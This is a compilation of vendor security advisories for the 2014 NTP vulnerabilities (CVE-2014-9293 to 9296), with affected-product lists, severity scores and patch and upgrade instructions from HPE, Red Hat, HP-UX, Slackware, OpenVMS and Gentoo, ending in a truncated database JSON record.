40-port 10GbE SFP+ FD TAA-compliant Module, JG789A HP FlexFabric 12500 4-port 100GbE CFP FG TAA-compliant Module, JG787A HP FlexFabric 12500 4-port 100GbE CFP FD TAA-compliant Module, JG798A HP FlexFabric 12508E Fabric Module H3C S12508 Routing Switch (AC-1) (0235A0GE), H3C S12518 Routing Switch (AC-1) (0235A0GF), H3C S12508 Chassis (0235A0E6), H3C S12508 Chassis (0235A38N), H3C S12518 Chassis (0235A0E7), H3C S12518 Chassis (0235A38M), H3C 12508 DC Switch Chassis (0235A38L), H3C 12518 DC Switch Chassis (0235A38K) CVE-2014-9295
11900 (Comware 7) R7169P01 JG608A HP FF 11908-V Switch Chassis, JG609A HP FF 11900 Main Processing Unit, JG610A HP FF 11908 1.92Tbps Type D Fabric Module, JG611A HP FF 11900 32p 10GbE SFP+ SF Module, JG612A HP FF 11900 48p 10GbE SFP+ SF Module, JG613A HP FF 11900 4p 40GbE QSFP+ SF Module, JG614A HP FF 11900 8p 40GbE QSFP+ SF Module, JG615A HP FF 11900 24-p 1/10GBASE-T SF Module, JG616A HP FF 11900 2500W AC Power Supply, JG617A HP FF 11900 2400W DC Power Supply, JG618A HP FF 11908-V Spare Fan Assy, JG918A HP FF 11900 2p 100GbE CFP SE Module
CVE-2014-9295
10500 (Comware 7) R7150 JC611A HP 10508-V Switch Chassis, JC612A HP 10508 Switch Chassis, JC613A HP 10504 Switch Chassis, JC748A HP 10512 Switch Chassis, JG820A HP 10504 TAA Switch Chassis, JG821A HP 10508 TAA Switch Chassis, JG822A HP 10508-V TAA Switch Chassis, JG823A HP 10512 TAA Switch Chassis, JG496A HP 10500 Type A MPU w/Comware v7 OS, JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System, JH191A HP 10500 44-port GbE(SFP,LC)/ 4-port 10GbE SFP+ (SFP+,LC) SE Module, JH192A HP 10500 48-port Gig-TRJ45SE Module, JH193A HP 10500 16-port 10GbE SFP+ (SFP+,LC) SF Module, JH194A HP 10500 24-port 10GbE SFP+ (SFP+,LC) EC Module, JH195A HP 10500 6-port 40GbE QSFP+ EC Module, JH196A HP 10500 2-port 100GbE CFP EC Module, JH197A HP 10500 48-port 10GbE SFP+ (SFP+,LC) SG Module N/A CVE-2014-9295
12900 (Comware 7) R1112 JG619A HP FlexFabric 12910 Switch AC Chassis, JG621A HP FlexFabric 12910 Main Processing Unit, JG632A HP FlexFabric 12916 Switch AC Chassis, JG634A HP FlexFabric 12916 Main Processing Unit
CVE-2014-9295
5900 (Comware 7) R2311P06 JC772A HP 5900AF-48XG-4QSFP+ Switch, JG336A HP 5900AF-48XGT-4QSFP+ Switch, JG510A HP 5900AF-48G-4XG-2QSFP+ Switch, JG554A HP 5900AF-48XG-4QSFP+ TAA Switch, JG838A HP FF 5900CP-48XG-4QSFP+ Switch, JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant, JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch, JH038A) HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
CVE-2014-9295
5920 (Comware 7) R2311P06 JG296A HP 5920AF-24XG Switch, JG555A HP 5920AF-24XG TAA Switch
CVE-2014-9295
MSR1000 (Comware 7) R0106P31 JG875A HP MSR1002-4 AC Router, JH060A HP MSR1003-8S AC Router
CVE-2014-9295
MSR2000 (Comware 7) R0106P31 JG411A HP MSR2003 AC Router, JG734A HP MSR2004-24 AC Router, JG735A) HP MSR2004-48 Router, JG866A HP MSR2003 TAA-compliant AC Router
CVE-2014-9295
MSR3000 (Comware 7) R0106P31 JG404A HP MSR3064 Router, JG405A HP MSR3044 Router, JG406A HP MSR3024 AC Router, JG407A HP MSR3024 DC Router, JG408A HP MSR3024 PoE Router, JG409A HP MSR3012 AC Router, JG410A HP MSR3012 DC Router, JG861A HP MSR3024 TAA-compliant AC Router
CVE-2014-9295
MSR4000 (Comware 7) R0106P31 JG402A HP MSR4080 Router Chassis, JG403A HP MSR4060 Router Chassis, JG412A HP MSR4000 MPU-100 Main Processing Unit, JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
CVE-2014-9295
5800 (Comware 7) R7006P12 JC099A HP 5800-24G-PoE Switch, JC099B HP 5800-24G-PoE+ Switch, JC100A HP 5800-24G Switch, JC100B HP 5800-24G Switch, JC101A HP 5800-48G Switch with 2 Slots, JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots, JC103A HP 5800-24G-SFP Switch, JC103B HP 5800-24G-SFP Switch with 1 Interface Slot, JC104A HP 5800-48G-PoE Switch, JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot, JC105A HP 5800-48G Switch, JC105B HP 5800-48G Switch with 1 Interface Slot, JG254A HP 5800-24G-PoE+ TAA-compliant Switch, JG254B HP 5800-24G-PoE+ TAA-compliant Switch, JG255A HP 5800-24G TAA-compliant Switch, JG255B HP 5800-24G TAA-compliant Switch, JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot, JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot, JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot, JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot, JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG225A HP 5800AF-48G Switch, JG225B HP 5800AF-48G Switch, JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots, JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots, JG243A HP 5820-24XG-SFP+ TAA-compliant Switch, JG243B HP 5820-24XG-SFP+ TAA-compliant Switch, JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots & 1 OAA Slot, JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot, JC106A HP 5820-14XG-SFP+ Switch with 2 Slots, JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots & 1 OAA Slot, JG219A HP 5820AF-24XG Switch, JG219B HP 5820AF-24XG Switch, JC102A HP 5820-24XG-SFP+ Switch, JC102B HP 5820-24XG-SFP+ Switch
CVE-2014-9295
VSR (Comware 7) R0204P01 JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software, JG811AAE HP VSR1001 Comware 7 Virtual Services Router, JG812AAE HP VSR1004 Comware 7 Virtual Services Router, JG813AAE HP VSR1008 Comware 7 Virtual Services Router
CVE-2014-9295
7900 (Comware 7) R2122 JG682A HP FlexFabric 7904 Switch Chassis, JG841A HP FlexFabric 7910 Switch Chassis, JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit, JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
CVE-2014-9295
5130 (Comware 7) R3108P03 JG932A HP 5130-24G-4SFP+ EI Switch, JG933A HP 5130-24G-SFP-4SFP+ EI Switch, JG934A HP 5130-48G-4SFP+ EI Switch, JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch, JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch, JG975A HP 5130-24G-4SFP+ EI Brazil Switch, JG976A HP 5130-48G-4SFP+ EI Brazil Switch, JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch, JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
CVE-2014-9295
5700 (Comware 7) R2311P06 JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch, JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch, JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch, JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch, JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch, JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
CVE-2014-9295
VCX 9.8.17 J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr, J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr, JC517A HP VCX V7205 Platform w/DL 360 G6 Server, JE355A HP VCX V6000 Branch Platform 9.0, JC516A HP VCX V7005 Platform w/DL 120 G6 Server, JC518A HP VCX Connect 200 Primry 120 G6 Server, J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr, JE341A HP VCX Connect 100 Secondary, JE252A HP VCX Connect Primary MIM Module, JE253A HP VCX Connect Secondary MIM Module, JE254A HP VCX Branch MIM Module, JE355A HP VCX V6000 Branch Platform 9.0, JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod, JD023A HP MSR30-40 Router with VCX MIM Module, JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM, JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod, JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod, JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod, JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS, JE340A HP VCX Connect 100 Pri Server 9.0, JE342A HP VCX Connect 100 Sec Server 9.0
CVE -2014-9293 CVE-2014-9294 CVE-2014-9295
HISTORY Version:1 (rev.1) - 9 December 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: ntp security update Advisory ID: RHSA-2015:0104-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0104.html Issue date: 2015-01-28 CVE Names: CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 CVE-2014-9296 =====================================================================
- Summary:
Updated ntp packages that fix several security issues are now available for Red Hat Enterprise Linux 6.5 Extended Update Support.
Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.5) - noarch, x86_64 Red Hat Enterprise Linux HPC Node EUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server EUS (v. 6.5) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 6.5) - i386, noarch, ppc64, s390x, x86_64
Multiple buffer overflow flaws were discovered in ntpd's crypto_recv(), ctl_putdata(), and configure() functions. Note: the crypto_recv() flaw requires non-default configurations to be active, while the ctl_putdata() flaw, by default, can only be exploited via local attackers, and the configure() flaw requires additional authentication to exploit. (CVE-2014-9295)
It was found that ntpd automatically generated weak keys for its internal use if no ntpdc request authentication key was specified in the ntp.conf configuration file. A remote attacker able to match the configured IP restrictions could guess the generated key, and possibly use it to send ntpdc query or configuration requests. (CVE-2014-9293)
It was found that ntp-keygen used a weak method for generating MD5 keys. This could possibly allow an attacker to guess generated MD5 keys that could then be used to spoof an NTP client or server. Note: it is recommended to regenerate any MD5 keys that had explicitly been generated with ntp-keygen; the default installation does not contain such keys. (CVE-2014-9294)
A missing return statement in the receive() function could potentially allow a remote attacker to bypass NTP's authentication mechanism. (CVE-2014-9296)
All ntp users are advised to upgrade to this updated package, which contains backported patches to resolve these issues. After installing the update, the ntpd daemon will restart automatically.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1176032 - CVE-2014-9293 ntp: automatic generation of weak default key in config_auth() 1176035 - CVE-2014-9294 ntp: ntp-keygen uses weak random number generator and seed when generating MD5 keys 1176037 - CVE-2014-9295 ntp: Multiple buffer overflows via specially-crafted packets 1176040 - CVE-2014-9296 ntp: receive() missing return on error
- Package List:
Red Hat Enterprise Linux HPC Node EUS (v. 6.5):
Source: ntp-4.2.6p5-2.el6_5.src.rpm
x86_64: ntp-4.2.6p5-2.el6_5.x86_64.rpm ntp-debuginfo-4.2.6p5-2.el6_5.x86_64.rpm ntpdate-4.2.6p5-2.el6_5.x86_64.rpm
Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.5):
Source: ntp-4.2.6p5-2.el6_5.src.rpm
noarch: ntp-doc-4.2.6p5-2.el6_5.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-2.el6_5.x86_64.rpm ntp-perl-4.2.6p5-2.el6_5.x86_64.rpm
Red Hat Enterprise Linux Server EUS (v. 6.5):
Source: ntp-4.2.6p5-2.el6_5.src.rpm
i386: ntp-4.2.6p5-2.el6_5.i686.rpm ntp-debuginfo-4.2.6p5-2.el6_5.i686.rpm ntpdate-4.2.6p5-2.el6_5.i686.rpm
ppc64: ntp-4.2.6p5-2.el6_5.ppc64.rpm ntp-debuginfo-4.2.6p5-2.el6_5.ppc64.rpm ntpdate-4.2.6p5-2.el6_5.ppc64.rpm
s390x: ntp-4.2.6p5-2.el6_5.s390x.rpm ntp-debuginfo-4.2.6p5-2.el6_5.s390x.rpm ntpdate-4.2.6p5-2.el6_5.s390x.rpm
x86_64: ntp-4.2.6p5-2.el6_5.x86_64.rpm ntp-debuginfo-4.2.6p5-2.el6_5.x86_64.rpm ntpdate-4.2.6p5-2.el6_5.x86_64.rpm
Red Hat Enterprise Linux Server Optional EUS (v. 6.5):
Source: ntp-4.2.6p5-2.el6_5.src.rpm
i386: ntp-debuginfo-4.2.6p5-2.el6_5.i686.rpm ntp-perl-4.2.6p5-2.el6_5.i686.rpm
noarch: ntp-doc-4.2.6p5-2.el6_5.noarch.rpm
ppc64: ntp-debuginfo-4.2.6p5-2.el6_5.ppc64.rpm ntp-perl-4.2.6p5-2.el6_5.ppc64.rpm
s390x: ntp-debuginfo-4.2.6p5-2.el6_5.s390x.rpm ntp-perl-4.2.6p5-2.el6_5.s390x.rpm
x86_64: ntp-debuginfo-4.2.6p5-2.el6_5.x86_64.rpm ntp-perl-4.2.6p5-2.el6_5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-9293 https://access.redhat.com/security/cve/CVE-2014-9294 https://access.redhat.com/security/cve/CVE-2014-9295 https://access.redhat.com/security/cve/CVE-2014-9296 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFUyTXWXlSAg2UNWIIRAsXzAKCilJuJeeWLOABs1xY+ueRvRTSpWACcDhoC YQlhn66RRMYQCWymo1OCUoI= =4Rft -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
Release Date: 2015-02-18 Last Updated: 2015-02-18
Potential Security Impact: Remote execution of code, Denial of Service (DoS), or other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP-UX running NTP. These could be exploited remotely to execute code, create a Denial of Service (DoS), or other vulnerabilities.
References:
CVE-2014-9293 - Insufficient Entropy in Pseudo-Random Number Generator (PRNG) (CWE-332) CVE-2014-9294 - Use of Cryptographically Weak PRNG (CWE-338) CVE-2014-9295 - Stack Buffer Overflow (CWE-121) CVE-2014-9296 - Error Conditions, Return Values, Status Codes (CWE-389) CVE-2014-9297 - Improper Check for Unusual or Exceptional Conditions (CWE-754) SSRT101872 VU#852879
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.31 running NTP version C.4.2.6.4.0 or previous HP-UX B.11.23 running XNTP version 3.5 or previous
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-9293 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9294 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9295 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9296 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-9297 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following patch for HP-UX B.11.31. A workaround for HP-UX B.11.23 and B.11.11 to temporarily resolve these vulnerabilities follows below.
The B.11.31 patch is available from: ftp://ntp42650:Secure12@h2.usa.hp.com or https://h20392.www2.hp.com/portal/sw depot/displayProductInfo.do?productNumber=HPUX-NTP
Mitigation steps for HP-UX B.11.23 and B.11.11 for CVE-2014-9295
Restrict query for server status (Time Service is not affected) from ntpq/ntpdc by enabling .noquery. using the restrict command in /etc/ntp.conf file.
Reference: http://support.ntp.org/bin/view/Main/SecurityNotice
NOTE: This bulletin will be revised when patches for XNTP v3.5 on B.11.23 and B.11.11 become available.
MANUAL ACTIONS: No
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.31
NTP.INETSVCS2-BOOT NTP.NTP-AUX NTP.NTP-RUN action: install revision C.4.2.6.5.0 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 18 February 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8-i486-1_slack14.1.txz: Upgraded. In addition to bug fixes and enhancements, this release fixes several high-severity vulnerabilities discovered by Neel Mehta and Stephen Roettger of the Google Security Team. For more information, see: https://www.kb.cert.org/vuls/id/852879 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8-i486-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 18d7f09e90cf2434f59d7e9f11478fba ntp-4.2.8-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: edd178e3d2636433dd18f52331af17a5 ntp-4.2.8-x86_64-1_slack13.0.txz
Slackware 13.1 package: 4b6da6fa564b1fe00920d402ff97bd43 ntp-4.2.8-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 292ae7dbd3ea593c5e28cbba7c2b71fa ntp-4.2.8-x86_64-1_slack13.1.txz
Slackware 13.37 package: 294b8197d360f9a3cf8186619b60b73c ntp-4.2.8-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: 7cd5b63f8371b1cc369bc56e4b4efd5a ntp-4.2.8-x86_64-1_slack13.37.txz
Slackware 14.0 package: 32eab67538c33e4669bda9200799a497 ntp-4.2.8-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 33ecf4845fa8533a12a98879815bde08 ntp-4.2.8-x86_64-1_slack14.0.txz
Slackware 14.1 package: f2b45a45c846a909ae201176ce359939 ntp-4.2.8-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 12d7ab6e2541af4d1282621d3773e7f7 ntp-4.2.8-x86_64-1_slack14.1.txz
Slackware -current package: 5b2150cee9840d8bb547098cccde879a n/ntp-4.2.8-i486-1.txz
Slackware x86_64 -current package: 9ce09c5d6a60d3e2117988e4551e4af1 n/ntp-4.2.8-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8-i486-1_slack14.1.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address.
References:
CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 CVE-2014-9296 CVE-2013-5211 SSRT102239
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Platform Patch Kit Name
Alpha IA64 V8.4 75-117-380_2015-08-24.BCK
NOTE: Please contact OpenVMS Technical Support to request these patch kits. The net-misc/ntp package contains the official reference implementation by the NTP Project.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/ntp < 4.2.8 >= 4.2.8
Description
Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.
Resolution
All NTP users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8"
References
[ 1 ] CVE-2014-9293 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9293 [ 2 ] CVE-2014-9294 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9294 [ 3 ] CVE-2014-9295 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9295 [ 4 ] CVE-2014-9296 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9296
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201412-34.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201412-0613", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntp", "scope": "lte", "trust": 1.0, "vendor": "ntp", "version": "4.2.7" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "apple", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "efficientip", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "f5", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "freebsd", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "huawei", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ntp", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "omniti", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "red hat", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "watchguard", "version": null }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.2.8" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sigmablade em card (n8405-043) for firmware rev.14.02 before" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ne single model / cluster model ver.002.08.08 previous version" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "nv7400/nv5400/nv3400 series" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "nv7500/nv5500/nv3500 series" }, { "model": "securebranch", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "version 3.2" }, { "model": "univerge", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "3c cmm" }, { "model": "univerge", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ip8800 series" }, { "model": "ap", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "7000" }, { "model": "ap", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "8800" }, { "model": "big-ip", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "1500" }, { "model": "bs", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "1000 series" }, { "model": "bs", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "2000 series" }, { "model": "bs", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "2500 series" }, { "model": "bs", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "320 series" }, { "model": "bs", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "500 series" }, { "model": "ha8000 series", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", 